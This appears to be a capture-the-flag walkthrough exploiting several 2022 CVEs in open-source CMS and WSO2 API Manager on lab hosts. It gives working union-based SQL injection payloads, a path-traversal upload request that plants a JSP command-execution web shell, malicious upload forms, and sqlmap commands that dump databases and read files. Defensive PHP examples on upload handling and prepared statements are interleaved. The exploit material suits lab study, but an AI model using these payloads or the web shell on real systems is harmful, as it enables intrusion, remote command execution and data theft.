CVE-2022-32991

Find the source code and audit it.

Searching by the CVE number turns up the name of the source package.

<@urlencode>-60377db362694'<@/urlencode>

60377db362694' or '1

60377db362694' order by 5 -- 
60377db362694' order by 6 --

60377db362694' union select 1,2,3,4,5 -- 

60377db362694' union select 1,2,(select group_concat(schema_name) from information_schema.schemata),4,5 -- 

60377db362694' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='flag'),4,5 -- 

60377db362694' union select 1,2,(select flag from ctf.flag),4,5 -- 

CVE-2022-30887

Set it up.

Look for the username and password.

This one is also very simple.

These are all arbitrary file uploads.

CVE-2022-29464

https://github.com/wso2/product-apim/releases/tag/v4.0.0

.\api-manager.bat

POST /fileupload/toolsAny HTTP/2
Host: eci-2zebqk49mtyq78wkry75.cloudeci1.ichunqiu.com:9443
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 882
Content-Type: multipart/form-data; boundary=4ef9f369a86bfaadf5ec3177278d49c0
User-Agent: python-requests/2.22.0


--4ef9f369a86bfaadf5ec3177278d49c0
Content-Disposition: form-data; name="../../../../repository/deployment/server/webapps/authenticationendpoint/1.jsp"; filename="../../../../repository/deployment/server/webapps/authenticationendpoint/1.jsp"

<FORM>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec(cmd,null,null);
BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) { output += s+"</br>"; }
} catch(IOException e) { e.printStackTrace(); }
}
%>
<%=output %>
--4ef9f369a86bfaadf5ec3177278d49c0--

CVE-2022-28525

move_uploaded_file

Looking at these upload handlers, this one allows unauthenticated upload.
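As an added example (not code from any project on this page), here is a hardened image-upload handler that addresses the two defects seen so far: a client-controlled filename used as a filesystem path (the ../ traversal in the WSO2 multipart request above) and an upload endpoint that never checks who is calling (this CMS). The images/ directory, the session key 'admin_id' and the field name 'new_image' are assumptions.

```php
<?php
// Added example, not code from any project on this page. A hardened
// image-upload handler: authorisation first, type derived from content,
// a generated filename, and a containment check on the final path.
// UPLOAD_DIR, the session key 'admin_id' and the field 'new_image' are assumptions.

const UPLOAD_DIR = __DIR__ . '/images';
const ALLOWED_TYPES = ['image/png' => 'png', 'image/jpeg' => 'jpg', 'image/gif' => 'gif'];
const MAX_BYTES = 2 * 1024 * 1024;

// True only if $path resolves to a location inside $baseDir. Use it for any path
// the application builds from request data; "x/../../y.jsp"-style names fail here.
function withinDirectory(string $baseDir, string $path): bool
{
    $base = realpath($baseDir);
    $parent = realpath(dirname($path));          // the file itself may not exist yet
    if ($base === false || $parent === false) {
        return false;
    }
    $leaf = basename($path);
    if ($leaf === '' || $leaf === '.' || $leaf === '..') {
        return false;
    }
    return $parent === $base || strpos($parent, $base . DIRECTORY_SEPARATOR) === 0;
}

function saveUpload(array $file, ?int $adminId): string
{
    // 1. Authorisation before anything else: anonymous callers get nothing.
    if ($adminId === null) {
        throw new RuntimeException('not authenticated');
    }
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('no valid upload');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }
    // 2. Derive the type from file content, not from the client's name or MIME header.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!isset(ALLOWED_TYPES[$mime])) {
        throw new RuntimeException('unsupported type');
    }
    // 3. Never reuse the client filename: generate the name and fix the extension,
    //    so a name like "zf.php" can never be the stored name whatever the request says.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED_TYPES[$mime];
    $dest = UPLOAD_DIR . DIRECTORY_SEPARATOR . $name;
    // 4. Defence in depth: the final path must still lie inside the upload directory.
    if (!withinDirectory(UPLOAD_DIR, $dest)) {
        throw new RuntimeException('path escapes upload directory');
    }
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('move failed');
    }
    return $name;
}

// Endpoint glue: the session, not a form field, decides whether the caller is an admin.
session_start();
try {
    $saved = saveUpload($_FILES['new_image'] ?? [], $_SESSION['admin_id'] ?? null);
    echo 'stored as ' . htmlspecialchars($saved);
} catch (RuntimeException $e) {
    http_response_code(400);
    echo htmlspecialchars($e->getMessage());
}
```

The generated name is the real control; withinDirectory is there for every other place the application turns request data into a path. The upload directory should additionally be served with script execution disabled, so even a misclassified file is never run by the PHP handler.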

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>upload</title>
</head>
<body>
<form action="http://eci-2ze3p3ftillcjaoxi4jq.cloudeci1.ichunqiu.com/admin/admin_includes/admin_edit_user.php" method="post" enctype="multipart/form-data">
<input type="text" name="updateusersubmit" value="123">
<input type="text" name="user_image" value="new">
<input type="file" name="new_image"><br>
<input type="submit" value="上传">

</form>
</body>
</html>

Build the form.

Then just browse to the corresponding directory.

http://eci-2ze3p3ftillcjaoxi4jq.cloudeci1.ichunqiu.com/admin/images/zf.php

CVE-2022-28512

When configuring the database settings, do a global search for blog_admin_db.

Fill in the password.

An obvious SQL injection.

python .\sqlmap.py  --batch -u http://eci-2ze8f6pzti1nb9zy5f57.cloudeci1.ichunqiu.com/single.php?id=5

python .\sqlmap.py  --batch -u http://eci-2ze8f6pzti1nb9zy5f57.cloudeci1.ichunqiu.com/single.php?id=5 --dbs

python .\sqlmap.py  --batch -u http://eci-2ze8f6pzti1nb9zy5f57.cloudeci1.ichunqiu.com/single.php?id=5 -D ctf --tables

python .\sqlmap.py  --batch -u http://eci-2ze8f6pzti1nb9zy5f57.cloudeci1.ichunqiu.com/single.php?id=5 -D ctf -T flag --columns

python .\sqlmap.py  --batch -u http://eci-2ze8f6pzti1nb9zy5f57.cloudeci1.ichunqiu.com/single.php?id=5 -D ctf -T flag -C flag --dump

CVE-2022-28060

Obvious injection.

This is also an obvious SQL injection, because the correct code should be:

$user_name = mysqli_real_escape_string($con, $user_name);

whereas here the string is escaped but the escaped result is never applied.
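As an added example (not the CMS's own code), the defect pattern just described is shown beside two fixes: the assignment the page gives, and a prepared statement, which also covers the unquoted numeric id=... parameters exploited with sqlmap elsewhere on this page, where escaping alone would not help. $con is assumed to be an open mysqli connection; the users table, its columns and the availability of mysqlnd (for get_result) are assumptions.

```php
<?php
// Added example, not the CMS's own code. Three versions of the same lookup.
// Assumes an open mysqli connection $con and a users(id, user_name) table.

// Vulnerable: mysqli_real_escape_string is called, but its return value is
// discarded, so the raw input is interpolated into the query unchanged.
function findUserBroken(mysqli $con, string $user_name): ?array
{
    mysqli_real_escape_string($con, $user_name);   // result never assigned back
    $sql = "SELECT id, user_name FROM users WHERE user_name = '$user_name'";
    $res = mysqli_query($con, $sql);
    return $res ? (mysqli_fetch_assoc($res) ?: null) : null;
}

// Fixed as the page shows: assign the escaped value before interpolating.
// This only protects a quoted string context; an unquoted id=... is still open.
function findUserEscaped(mysqli $con, string $user_name): ?array
{
    $user_name = mysqli_real_escape_string($con, $user_name);
    $sql = "SELECT id, user_name FROM users WHERE user_name = '$user_name'";
    $res = mysqli_query($con, $sql);
    return $res ? (mysqli_fetch_assoc($res) ?: null) : null;
}

// Preferred: a prepared statement keeps data and SQL separate in every context,
// so a forgotten assignment or a missing quote cannot reintroduce injection.
function findUserPrepared(mysqli $con, string $user_name): ?array
{
    $stmt = $con->prepare("SELECT id, user_name FROM users WHERE user_name = ?");
    $stmt->bind_param('s', $user_name);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// The same applies to the numeric single.php?id=5 style parameters on this page:
function findPostById(mysqli $con, int $id): ?array
{
    $stmt = $con->prepare("SELECT id, title FROM posts WHERE id = ?");
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}
```

Calling findPostById with (int) $_GET['id'] rejects non-numeric input before the query is built, which is the check the vulnerable single.php is missing.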

There is also a file upload here.

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>upload</title>
</head>
<body>
<form action="http://stu/admin/includes/admin_add_post.php" method="post" enctype="multipart/form-data">
<input type="text" name="create_post" value="123">
<input type="file" name="post_image"><br>
<input type="submit" value="上传">

</form>
</body>
</html>

python .\sqlmap.py  --batch -r D:\Download\sql.txt --dbs

python .\sqlmap.py  --batch -r D:\Download\sql.txt -D php_cms --tables

No flag in the database, so guess it is in a file.

python .\sqlmap.py  --batch -r D:\Download\sql.txt --sql-shell
select load_file('/flag')

CVE-2022-26201

There are quite a few injection points.

python .\sqlmap.py  --batch -r D:\Download\sql.txt --dbs

python .\sqlmap.py  --batch -r D:\Download\sql.txt --file-read  "/flag"

CVE-2022-26965

Clearly a file upload here, followed by extraction.

Log in as admin.

Zip up the PHP file.

http://eci-2zeinn5hdxurnzllfr7s.cloudeci1.ichunqiu.com/data/themes/zf/zf.php

Just browse to it.
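As an added example (not the CMS's own code), here is how a theme installer can validate every archive entry before extracting, so an uploaded zip cannot drop a .php file into data/themes/ or write outside the theme directory as in the walkthrough above. The themes/ path, the allowed-extension list and the theme-name pattern are assumptions.

```php
<?php
// Added example, not the CMS's own code. Inspect each entry of an uploaded
// theme archive and refuse the whole archive on the first problem found.
// THEME_DIR and THEME_EXT are assumptions.

const THEME_DIR = __DIR__ . '/data/themes';
const THEME_EXT = ['css', 'js', 'png', 'jpg', 'gif', 'svg', 'html', 'twig'];

// Returns a list of problems; an empty list means the archive is acceptable.
function validateThemeArchive(string $zipPath): array
{
    $zip = new ZipArchive();
    if ($zip->open($zipPath) !== true) {
        throw new RuntimeException('cannot open archive');
    }
    $problems = [];
    for ($i = 0; $i < $zip->numFiles; $i++) {
        $raw = $zip->getNameIndex($i);
        if ($raw === false || $raw === '') {
            $problems[] = "entry $i: unreadable name";
            continue;
        }
        $entry = str_replace('\\', '/', $raw);        // normalise separators first
        $parts = explode('/', rtrim($entry, '/'));
        // Absolute paths and any ".." component escape the target directory.
        if ($entry[0] === '/' || in_array('..', $parts, true)) {
            $problems[] = "$raw: absolute path or traversal";
            continue;
        }
        // Directories need only the component check; files must match the whitelist.
        if (substr($entry, -1) !== '/') {
            $ext = strtolower(pathinfo($entry, PATHINFO_EXTENSION));
            if (!in_array($ext, THEME_EXT, true)) {
                $problems[] = "$raw: extension '$ext' not allowed in a theme";
            }
        }
    }
    $zip->close();
    return $problems;
}

function installTheme(string $zipPath, string $themeName): void
{
    // The theme name becomes a directory name, so it is restricted to a safe charset.
    if (!preg_match('/^[a-z0-9_-]{1,32}$/', $themeName)) {
        throw new RuntimeException('bad theme name');
    }
    $problems = validateThemeArchive($zipPath);
    if ($problems) {
        throw new RuntimeException("archive rejected:\n" . implode("\n", $problems));
    }
    $target = THEME_DIR . '/' . $themeName;
    if (!is_dir($target) && !mkdir($target, 0755, true)) {
        throw new RuntimeException('cannot create theme directory');
    }
    $zip = new ZipArchive();
    if ($zip->open($zipPath) !== true || !$zip->extractTo($target)) {
        throw new RuntimeException('extraction failed');
    }
    $zip->close();
}
```

A zip containing zf.php is rejected by the extension whitelist before anything is written. The whitelist is deliberately a positive list rather than a ban on .php, so .phtml, .phar and similar handler extensions are excluded too; the theme directory should still be served with script execution disabled.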

CVE-2022-25578

Default password: admin tao

CVE-2022-25488

An obvious SQL injection.

python .\sqlmap.py  --batch -u http://eci-2ze34jnwwd2dzf7jz8el.cloudeci1.ichunqiu.com/admin/ajax/avatar.php?id=1 --dbs

python .\sqlmap.py  --batch -u http://eci-2ze34jnwwd2dzf7jz8el.cloudeci1.ichunqiu.com/admin/ajax/avatar.php?id=1 --sql-shell
select load_file('/flag')
